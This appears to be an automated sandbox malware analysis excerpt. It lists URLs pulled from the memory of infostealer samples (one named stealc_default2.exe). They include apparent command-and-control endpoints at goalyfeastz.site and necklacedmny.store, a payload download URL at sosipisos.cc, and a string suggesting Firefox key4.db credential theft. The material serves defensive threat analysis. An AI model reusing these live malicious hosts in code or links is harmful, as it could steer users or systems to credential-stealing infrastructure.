Source: new_v8.exe, 0000001B.00000003.2734376814.00000000039BC000.00000004.00000800.00020000.00000000.sdmp, new_v8.exe, 0000001B.00000003.2733596178.00000000039BE000.00000004.00000800.00020000.00000000.sdmp, new_v8.exe, 0000001B.00000003.2733888758.00000000039BC000.00000004.00000800.00020000.00000000.sdmp, c1a4d3220c.exe, 00000021.00000003.2913098718.000000000591F000.00000004.00000800.00020000.00000000.sdmp, GOLD1234.exe, 00000025.00000003.2944595083.00000000039CC000.00000004.00000800.00020000.00000000.sdmp, GOLD1234.exe, 00000025.00000003.2953869224.00000000039CA000.00000004.00000800.00020000.00000000.sdmp, GOLD1234.exe, 00000025.00000003.2949495792.00000000039CA000.00000004.00000800.00020000.00000000.sdmp, shop.exe, 00000032.00000003.3106922930.0000000003B5B000.00000004.00000800.00020000.00000000.sdmp, shop.exe, 00000032.00000003.3105886803.0000000003B5D000.00000004.00000800.00020000.00000000.sdmp, shop.exe, 00000032.00000003.3107663794.0000000003B5B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: new_v8.exe, 0000001B.00000003.2734376814.00000000039BC000.00000004.00000800.00020000.00000000.sdmp, new_v8.exe, 0000001B.00000003.2733596178.00000000039BE000.00000004.00000800.00020000.00000000.sdmp, new_v8.exe, 0000001B.00000003.2733888758.00000000039BC000.00000004.00000800.00020000.00000000.sdmp, c1a4d3220c.exe, 00000021.00000003.2913098718.000000000591F000.00000004.00000800.00020000.00000000.sdmp, GOLD1234.exe, 00000025.00000003.2944595083.00000000039CC000.00000004.00000800.00020000.00000000.sdmp, GOLD1234.exe, 00000025.00000003.2953869224.00000000039CA000.00000004.00000800.00020000.00000000.sdmp, GOLD1234.exe, 00000025.00000003.2949495792.00000000039CA000.00000004.00000800.00020000.00000000.sdmp, shop.exe, 00000032.00000003.3106922930.0000000003B5B000.00000004.00000800.00020000.00000000.sdmp, shop.exe, 00000032.00000003.3105886803.0000000003B5D000.00000004.00000800.00020000.00000000.sdmp, shop.exe, 00000032.00000003.3107663794.0000000003B5B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: shop.exe, 00000032.00000003.3571302943.00000000015BC000.00000004.00000020.00020000.00000000.sdmp, shop.exe, 00000032.00000002.3575188417.000000000164B000.00000004.00000020.00020000.00000000.sdmp, shop.exe, 00000032.00000003.3137226821.0000000001656000.00000004.00000020.00020000.00000000.sdmp, shop.exe, 00000032.00000003.3573133874.000000000164A000.00000004.00000020.00020000.00000000.sdmp, shop.exe, 00000032.00000003.3318669001.00000000015CD000.00000004.00000020.00020000.00000000.sdmp, shop.exe, 00000032.00000003.3385557240.0000000003B23000.00000004.00000800.00020000.00000000.sdmp, shop.exe, 00000032.00000003.3132876164.0000000003B20000.00000004.00000800.00020000.00000000.sdmp, shop.exe, 00000032.00000003.3361156674.0000000001652000.00000004.00000020.00020000.00000000.sdmp, shop.exe, 00000032.00000003.3172906832.0000000001652000.00000004.00000020.00020000.00000000.sdmp, shop.exe, 00000032.00000003.3137274134.000000000165E000.00000004.00000020.00020000.00000000.sdmp, shop.exe, 00000032.00000002.3577128165.0000000003B23000.00000004.00000800.00020000.00000000.sdmp, shop.exe, 00000032.00000003.3318239726.0000000003B20000.00000004.00000800.00020000.00000000.sdmp, shop.exe, 00000032.00000003.3175294707.0000000003B22000.00000004.00000800.00020000.00000000.sdmp, shop.exe, 00000032.00000003.3146895960.0000000003B20000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://goalyfeastz.site/
Source: shop.exe, 00000032.00000003.3160434239.0000000003B28000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://goalyfeastz.site/8
Source: shop.exe, 00000032.00000003.3161659780.0000000003B28000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://goalyfeastz.site/=
Source: GOLD1234.exe, 00000025.00000003.3420299008.0000000000F13000.00000004.00000020.00020000.00000000.sdmp, GOLD1234.exe, 00000025.00000003.3234339463.0000000000F13000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://goalyfeastz.site/?
Source: shop.exe, 00000032.00000003.3160434239.0000000003B28000.00000004.00000800.00020000.00000000.sdmp, shop.exe, 00000032.00000003.3161659780.0000000003B28000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://goalyfeastz.site/?m
Source: shop.exe, 00000032.00000003.3571108803.0000000001646000.00000004.00000020.00020000.00000000.sdmp, shop.exe, 00000032.00000002.3575188417.000000000164B000.00000004.00000020.00020000.00000000.sdmp, shop.exe, 00000032.00000003.3573133874.000000000164A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://goalyfeastz.site/B
Source: GOLD1234.exe, 00000025.00000003.3234339463.0000000000F06000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://goalyfeastz.site/KCz
Source: shop.exe, 00000032.00000002.3574945711.00000000015F0000.00000004.00000020.00020000.00000000.sdmp, shop.exe, 00000032.00000003.3398055770.0000000001670000.00000004.00000020.00020000.00000000.sdmp, shop.exe, 00000032.00000003.3571302943.00000000015BC000.00000004.00000020.00020000.00000000.sdmp, shop.exe, 00000032.00000003.3365556478.00000000015F0000.00000004.00000020.00020000.00000000.sdmp, shop.exe, 00000032.00000003.3571302943.00000000015CD000.00000004.00000020.00020000.00000000.sdmp, shop.exe, 00000032.00000003.3161598485.0000000001655000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://goalyfeastz.site/api
Source: shop.exe, 00000032.00000003.3571302943.00000000015F0000.00000004.00000020.00020000.00000000.sdmp, shop.exe, 00000032.00000002.3574945711.00000000015F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://goalyfeastz.site/api0-Q
Source: GOLD1234.exe, 00000025.00000003.3420299008.0000000000F06000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://goalyfeastz.site/api:
Source: GOLD1234.exe, 00000025.00000003.2981305297.0000000000F6B000.00000004.00000020.00020000.00000000.sdmp, GOLD1234.exe, 00000025.00000003.3127124077.0000000000F6E000.00000004.00000020.00020000.00000000.sdmp, GOLD1234.exe, 00000025.00000003.3098957154.0000000000F6F000.00000004.00000020.00020000.00000000.sdmp, GOLD1234.exe, 00000025.00000003.3126824181.0000000000F6B000.00000004.00000020.00020000.00000000.sdmp, GOLD1234.exe, 00000025.00000003.3048486160.0000000000F6B000.00000004.00000020.00020000.00000000.sdmp, GOLD1234.exe, 00000025.00000003.3226982086.0000000000F8A000.00000004.00000020.00020000.00000000.sdmp, GOLD1234.exe, 00000025.00000003.3147801023.0000000000F6F000.00000004.00000020.00020000.00000000.sdmp, GOLD1234.exe, 00000025.00000003.3420863597.0000000000F8A000.00000004.00000020.00020000.00000000.sdmp, GOLD1234.exe, 00000025.00000003.3269711303.0000000000F89000.00000004.00000020.00020000.00000000.sdmp, GOLD1234.exe, 00000025.00000003.2993220330.0000000000F6F000.00000004.00000020.00020000.00000000.sdmp, GOLD1234.exe, 00000025.00000003.3156872332.0000000000F6F000.00000004.00000020.00020000.00000000.sdmp, GOLD1234.exe, 00000025.00000003.3419949484.0000000000F89000.00000004.00000020.00020000.00000000.sdmp, GOLD1234.exe, 00000025.00000003.3157231448.0000000000F87000.00000004.00000020.00020000.00000000.sdmp, shop.exe, 00000032.00000003.3284579257.000000000165F000.00000004.00000020.00020000.00000000.sdmp, shop.exe, 00000032.00000003.3318306833.0000000001669000.00000004.00000020.00020000.00000000.sdmp, shop.exe, 00000032.00000002.3575346038.0000000001673000.00000004.00000020.00020000.00000000.sdmp, shop.exe, 00000032.00000003.3570754221.0000000001673000.00000004.00000020.00020000.00000000.sdmp, shop.exe, 00000032.00000003.3396975066.0000000001670000.00000004.00000020.00020000.00000000.sdmp, shop.exe, 00000032.00000003.3178681399.000000000165E000.00000004.00000020.00020000.00000000.sdmp, shop.exe, 00000032.00000003.3134934395.0000000001652000.00000004.00000020.00020000.00000000.sdmp, shop.exe, 00000032.00000003.3313436090.000000000165F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://goalyfeastz.site/apiDk
Source: shop.exe, 00000032.00000003.3237340411.00000000015F0000.00000004.00000020.00020000.00000000.sdmp, shop.exe, 00000032.00000003.3365556478.00000000015F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://goalyfeastz.site/apiU-
Source: GOLD1234.exe, 00000025.00000003.2981305297.0000000000F6B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://goalyfeastz.site/apihq
Source: GOLD1234.exe, 00000025.00000003.3420863597.0000000000F8A000.00000004.00000020.00020000.00000000.sdmp, GOLD1234.exe, 00000025.00000003.3269711303.0000000000F89000.00000004.00000020.00020000.00000000.sdmp, GOLD1234.exe, 00000025.00000003.3476176212.0000000000F8B000.00000004.00000020.00020000.00000000.sdmp, GOLD1234.exe, 00000025.00000003.3419949484.0000000000F89000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://goalyfeastz.site/apila=q
Source: GOLD1234.exe, 00000025.00000003.3476176212.0000000000F8B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://goalyfeastz.site/apilaZq
Source: GOLD1234.exe, 00000025.00000003.3420299008.0000000000F13000.00000004.00000020.00020000.00000000.sdmp, GOLD1234.exe, 00000025.00000003.3234339463.0000000000F13000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://goalyfeastz.site/apin
Source: shop.exe, 00000032.00000003.3396975066.0000000001670000.00000004.00000020.00020000.00000000.sdmp, shop.exe, 00000032.00000002.3575305695.0000000001670000.00000004.00000020.00020000.00000000.sdmp, shop.exe, 00000032.00000003.3572763992.0000000001670000.00000004.00000020.00020000.00000000.sdmp, shop.exe, 00000032.00000003.3398055770.0000000001670000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://goalyfeastz.site/apiop4
Source: shop.exe, 00000032.00000002.3575346038.0000000001673000.00000004.00000020.00020000.00000000.sdmp, shop.exe, 00000032.00000003.3570754221.0000000001673000.00000004.00000020.00020000.00000000.sdmp, shop.exe, 00000032.00000003.3573096106.0000000001673000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://goalyfeastz.site/h
Source: GOLD1234.exe, 00000025.00000003.3098957154.0000000000F6F000.00000004.00000020.00020000.00000000.sdmp, GOLD1234.exe, 00000025.00000003.3048486160.0000000000F6B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://goalyfeastz.site/mm
Source: GOLD1234.exe, 00000025.00000003.2971601719.0000000003990000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://goalyfeastz.site/o
Source: shop.exe, 00000032.00000003.3160434239.0000000003B28000.00000004.00000800.00020000.00000000.sdmp, shop.exe, 00000032.00000003.3161659780.0000000003B28000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://goalyfeastz.site/rpwls
Source: shop.exe, 00000032.00000003.3396975066.0000000001670000.00000004.00000020.00020000.00000000.sdmp, shop.exe, 00000032.00000003.3546805059.0000000001673000.00000004.00000020.00020000.00000000.sdmp, shop.exe, 00000032.00000003.3398055770.0000000001670000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://goalyfeastz.site/u
Source: GOLD1234.exe, 00000025.00000003.3420863597.0000000000F8A000.00000004.00000020.00020000.00000000.sdmp, GOLD1234.exe, 00000025.00000003.3269711303.0000000000F89000.00000004.00000020.00020000.00000000.sdmp, GOLD1234.exe, 00000025.00000003.3476176212.0000000000F8B000.00000004.00000020.00020000.00000000.sdmp, GOLD1234.exe, 00000025.00000003.3419949484.0000000000F89000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://goalyfeastz.site/x
Source: GOLD1234.exe, 00000025.00000003.3234339463.0000000000F06000.00000004.00000020.00020000.00000000.sdmp, GOLD1234.exe, 00000025.00000003.3420299008.0000000000F06000.00000004.00000020.00020000.00000000.sdmp, shop.exe, 00000032.00000003.3134934395.0000000001652000.00000004.00000020.00020000.00000000.sdmp, shop.exe, 00000032.00000003.3396975066.000000000168C000.00000004.00000020.00020000.00000000.sdmp, shop.exe, 00000032.00000003.3237340411.00000000015F0000.00000004.00000020.00020000.00000000.sdmp, shop.exe, 00000032.00000003.3137226821.0000000001656000.00000004.00000020.00020000.00000000.sdmp, shop.exe, 00000032.00000003.3397635245.000000000168C000.00000004.00000020.00020000.00000000.sdmp, shop.exe, 00000032.00000003.3161598485.0000000001655000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://goalyfeastz.site:443/api
Source: GOLD1234.exe, 00000025.00000003.3234339463.0000000000F06000.00000004.00000020.00020000.00000000.sdmp, GOLD1234.exe, 00000025.00000003.3420299008.0000000000F06000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://goalyfeastz.site:443/api2o4p.default-release/key4.dbPK
Source: GOLD1234.exe, 00000025.00000003.3234339463.0000000000F06000.00000004.00000020.00020000.00000000.sdmp, GOLD1234.exe, 00000025.00000003.3420299008.0000000000F06000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://goalyfeastz.site:443/apitxtPK
Source: new_v8.exe, 0000001B.00000003.2701683074.00000000011F3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://help.steampowered.com/
Source: new_v8.exe, 0000001B.00000003.2697182708.0000000001227000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001B.00000003.2713217839.0000000001237000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://help.steampowered.com/en/
Source: shop.exe, 00000032.00000003.3218081015.0000000001655000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
Source: new_v8.exe, 0000001B.00000003.2701683074.00000000011F3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.steampowered.com/
Source: new_v8.exe, 0000001B.00000003.2701683074.00000000011F3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lv.queniujq.cn
Source: new_v8.exe, 0000001B.00000003.2701683074.00000000011F3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://medal.tv
Source: c1a4d3220c.exe, 00000021.00000003.3197330580.00000000012E4000.00000004.00000020.00020000.00000000.sdmp, c1a4d3220c.exe, 00000021.00000003.2995423907.00000000012F1000.00000004.00000020.00020000.00000000.sdmp, c1a4d3220c.exe, 00000021.00000003.2894968481.00000000012F5000.00000004.00000020.00020000.00000000.sdmp, c1a4d3220c.exe, 00000021.00000003.2895449754.00000000012F6000.00000004.00000020.00020000.00000000.sdmp, c1a4d3220c.exe, 00000021.00000003.3426244522.00000000012E4000.00000004.00000020.00020000.00000000.sdmp, c1a4d3220c.exe, 00000021.00000003.3124289253.00000000012F7000.00000004.00000020.00020000.00000000.sdmp, c1a4d3220c.exe, 00000021.00000003.2999744421.00000000012F5000.00000004.00000020.00020000.00000000.sdmp, c1a4d3220c.exe, 00000021.00000003.2996701233.00000000012F5000.00000004.00000020.00020000.00000000.sdmp, c1a4d3220c.exe, 00000021.00000003.3052777343.00000000012F6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://necklacedmny.store/
Source: c1a4d3220c.exe, 00000021.00000003.2995423907.00000000012F1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://necklacedmny.store/88
Source: c1a4d3220c.exe, 00000021.00000003.2995423907.00000000012F1000.00000004.00000020.00020000.00000000.sdmp, c1a4d3220c.exe, 00000021.00000003.3239817137.0000000001317000.00000004.00000020.00020000.00000000.sdmp, c1a4d3220c.exe, 00000021.00000003.2907838165.00000000012F2000.00000004.00000020.00020000.00000000.sdmp, c1a4d3220c.exe, 00000021.00000003.3125524590.0000000001316000.00000004.00000020.00020000.00000000.sdmp, c1a4d3220c.exe, 00000021.00000003.3124989679.0000000001312000.00000004.00000020.00020000.00000000.sdmp, c1a4d3220c.exe, 00000021.00000003.3261286984.0000000001309000.00000004.00000020.00020000.00000000.sdmp, c1a4d3220c.exe, 00000021.00000003.3426244522.00000000012E4000.00000004.00000020.00020000.00000000.sdmp, c1a4d3220c.exe, 00000021.00000003.2894968481.00000000012EF000.00000004.00000020.00020000.00000000.sdmp, c1a4d3220c.exe, 00000021.00000003.3124289253.00000000012F7000.00000004.00000020.00020000.00000000.sdmp, c1a4d3220c.exe, 00000021.00000003.2924863746.00000000012F2000.00000004.00000020.00020000.00000000.sdmp, c1a4d3220c.exe, 00000021.00000003.3124530510.0000000001309000.00000004.00000020.00020000.00000000.sdmp, c1a4d3220c.exe, 00000021.00000003.3026321552.00000000012EF000.00000004.00000020.00020000.00000000.sdmp, c1a4d3220c.exe, 00000021.00000003.3124800918.000000000130E000.00000004.00000020.00020000.00000000.sdmp, c1a4d3220c.exe, 00000021.00000003.2996701233.00000000012F5000.00000004.00000020.00020000.00000000.sdmp, c1a4d3220c.exe, 00000021.00000003.3147328851.0000000001317000.00000004.00000020.00020000.00000000.sdmp, c1a4d3220c.exe, 00000021.00000003.3052777343.00000000012F6000.00000004.00000020.00020000.00000000.sdmp, c1a4d3220c.exe, 00000021.00000003.3099529730.00000000012F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://necklacedmny.store/api
Source: c1a4d3220c.exe, 00000021.00000003.2995423907.00000000012F1000.00000004.00000020.00020000.00000000.sdmp, c1a4d3220c.exe, 00000021.00000003.2996701233.00000000012F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://necklacedmny.store/api&O
Source: c1a4d3220c.exe, 00000021.00000003.3261447035.0000000001304000.00000004.00000020.00020000.00000000.sdmp, c1a4d3220c.exe, 00000021.00000003.3240812796.0000000001304000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://necklacedmny.store/api1
Source: c1a4d3220c.exe, 00000021.00000003.3026321552.00000000012EF000.00000004.00000020.00020000.00000000.sdmp, c1a4d3220c.exe, 00000021.00000003.3052777343.00000000012F6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://necklacedmny.store/apiA
Source: c1a4d3220c.exe, 00000021.00000003.3148528207.00000000012E4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://necklacedmny.store/apiL
Source: c1a4d3220c.exe, 00000021.00000003.3197330580.00000000012E4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://necklacedmny.store/d
Source: c1a4d3220c.exe, 00000021.00000003.3026321552.00000000012EF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://necklacedmny.store/i
Source: c1a4d3220c.exe, 00000021.00000003.3099529730.00000000012F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://necklacedmny.store/n
Source: c1a4d3220c.exe, 00000021.00000003.2907838165.00000000012F2000.00000004.00000020.00020000.00000000.sdmp, c1a4d3220c.exe, 00000021.00000003.2894968481.00000000012EF000.00000004.00000020.00020000.00000000.sdmp, c1a4d3220c.exe, 00000021.00000003.2924863746.00000000012F2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://necklacedmny.store:443/api
Source: c1a4d3220c.exe, 00000021.00000003.2986190918.00000000058FF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://necklacedmny.store:443/apij
Source: new_v8.exe, 0000001B.00000003.2701683074.00000000011F3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://player.vimeo.com
Source: new_v8.exe, 0000001B.00000003.2701683074.00000000011F3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://recaptcha.net
Source: new_v8.exe, 0000001B.00000003.2701683074.00000000011F3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://recaptcha.net/recaptcha/;
Source: new_v8.exe, 0000001B.00000003.2701683074.00000000011F3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://s.ytimg.com;
Source: new_v8.exe, 0000001B.00000003.2701683074.00000000011F3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sketchfab.com
Source: axplong.exe, 00000005.00000003.3273657100.0000000005FA7000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000005.00000003.2912523697.0000000005F85000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sosipisos.cc/
Source: axplong.exe, 00000005.00000003.3273657100.0000000005FA7000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000005.00000003.2912523697.0000000005F85000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sosipisos.cc/G
Source: axplong.exe, 00000005.00000003.2912523697.0000000005F85000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sosipisos.cc/shop.exe
Source: axplong.exe, 00000005.00000003.2912523697.0000000005F85000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sosipisos.cc/shop.exe6
Source: new_v8.exe, 0000001B.00000003.2701683074.00000000011F3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steam.tv/
Source: new_v8.exe, 0000001B.00000003.2701683074.00000000011F3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcast-test.akamaized.net
Source: new_v8.exe, 0000001B.00000003.2701683074.00000000011F3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcast.akamaized.net
Source: new_v8.exe, 0000001B.00000003.2701683074.00000000011F3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcastchat.akamaized.net
Source: new_v8.exe, 0000001B.00000003.2713217839.0000000001237000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/
Source: new_v8.exe, 0000001B.00000003.2701683074.00000000011F3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/-
Source: new_v8.exe, 0000001B.00000003.2697182708.0000000001227000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001B.00000003.2713217839.0000000001237000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
Source: new_v8.exe, 0000001B.00000003.2697182708.0000000001227000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001B.00000003.2713217839.0000000001237000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/discussions/
Source: new_v8.exe, 0000001B.00000003.2697182708.0000000001227000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001B.00000003.2713217839.0000000001237000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
Source: new_v8.exe, 0000001B.00000003.2713217839.0000000001237000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
Source: new_v8.exe, 0000001B.00000003.2697182708.0000000001227000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001B.00000003.2713217839.0000000001237000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/market/
Source: new_v8.exe, 0000001B.00000003.2697182708.0000000001227000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001B.00000003.2713217839.0000000001237000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/my/wishlist/
Source: new_v8.exe, 0000001B.00000003.2697182708.0000000001227000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001B.00000003.2713217839.0000000001237000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
Source: new_v8.exe, 0000001B.00000003.2697182708.0000000001227000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001B.00000003.2713217839.0000000001237000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
Source: new_v8.exe, 0000001B.00000003.2697182708.0000000001227000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001B.00000003.2713217839.0000000001237000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/workshop/
Source: new_v8.exe, 0000001B.00000003.2713217839.0000000001237000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/
Source: new_v8.exe, 0000001B.00000003.2701683074.00000000011F3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/;
Source: new_v8.exe, 0000001B.00000003.2713217839.0000000001237000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/about/
Source: new_v8.exe, 0000001B.00000003.2697182708.0000000001227000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001B.00000003.2713217839.0000000001237000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/explore/
Source: new_v8.exe, 0000001B.00000003.2697182708.0000000001227000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001B.00000003.2713217839.0000000001237000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/legal/
Source: new_v8.exe, 0000001B.00000003.2697182708.0000000001227000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001B.00000003.2713217839.0000000001237000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/mobile
Source: new_v8.exe, 0000001B.00000003.2697182708.0000000001227000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001B.00000003.2713217839.0000000001237000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/news/
Source: new_v8.exe, 0000001B.00000003.2697182708.0000000001227000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001B.00000003.2713217839.0000000001237000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/points/shop/
Source: new_v8.exe, 0000001B.00000003.2697182708.0000000001227000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001B.00000003.2713217839.0000000001237000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/privacy_agreement/
Source: new_v8.exe, 0000001B.00000003.2697182708.0000000001227000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001B.00000003.2713217839.0000000001237000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/stats/
Source: new_v8.exe, 0000001B.00000003.2697182708.0000000001227000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001B.00000003.2713217839.0000000001237000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/steam_refunds/
Source: new_v8.exe, 0000001B.00000003.2697182708.0000000001227000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001B.00000003.2713217839.0000000001237000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/subscriber_agreement/
Source: new_v8.exe, 0000001B.00000003.2729333036.00000000039D3000.00000004.00000800.00020000.00000000.sdmp, c1a4d3220c.exe, 00000021.00000003.2895711976.000000000594E000.00000004.00000800.00020000.00000000.sdmp, GOLD1234.exe, 00000025.00000003.2935060816.00000000039E1000.00000004.00000800.00020000.00000000.sdmp, shop.exe, 00000032.00000003.3094923714.0000000003B72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.microsof
Source: shop.exe, 00000032.00000003.3207526089.0000000003C35000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: shop.exe, 00000032.00000003.3207526089.0000000003C35000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: stealc_default2.exe, 00000006.00000003.2581126375.0000000027DD7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
Source: stealc_default2.exe, 00000006.00000002.2613116477.0000000000F6A000.00000004.00000001.01000000.00000009.sdmp, stealc_default2.exe, 00000006.00000002.2613116477.0000000000F5A000.00000004.00000001.01000000.00000009.sdmp, stealc_default2.exe, 00000006.00000003.2475599150.0000000021A81000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001B.00000003.2731706429.00000000039CA000.00000004.00000800.00020000.00000000.sdmp, new_v8.exe, 0000001B.00000003.2730636393.00000000039CA000.00000004.00000800.00020000.00000000.sdmp, new_v8.exe, 0000001B.00000003.2729333036.00000000039D1000.00000004.00000800.00020000.00000000.sdmp, c1a4d3220c.exe, 00000021.00000003.2895711976.000000000594C000.00000004.00000800.00020000.00000000.sdmp, GOLD1234.exe, 00000025.00000003.2935060816.00000000039DF000.00000004.00000800.00020000.00000000.sdmp, shop.exe, 00000032.00000003.3098799656.0000000003B69000.00000004.00000800.00020000.00000000.sdmp, shop.exe, 00000032.00000003.3094923714.0000000003B70000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: stealc_default2.exe, 00000006.00000002.2613116477.0000000000F6A000.00000004.00000001.01000000.00000009.sdmp, stealc_default2.exe, 00000006.00000002.2613116477.0000000000F5A000.00000004.00000001.01000000.00000009.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK201621kbG1nY
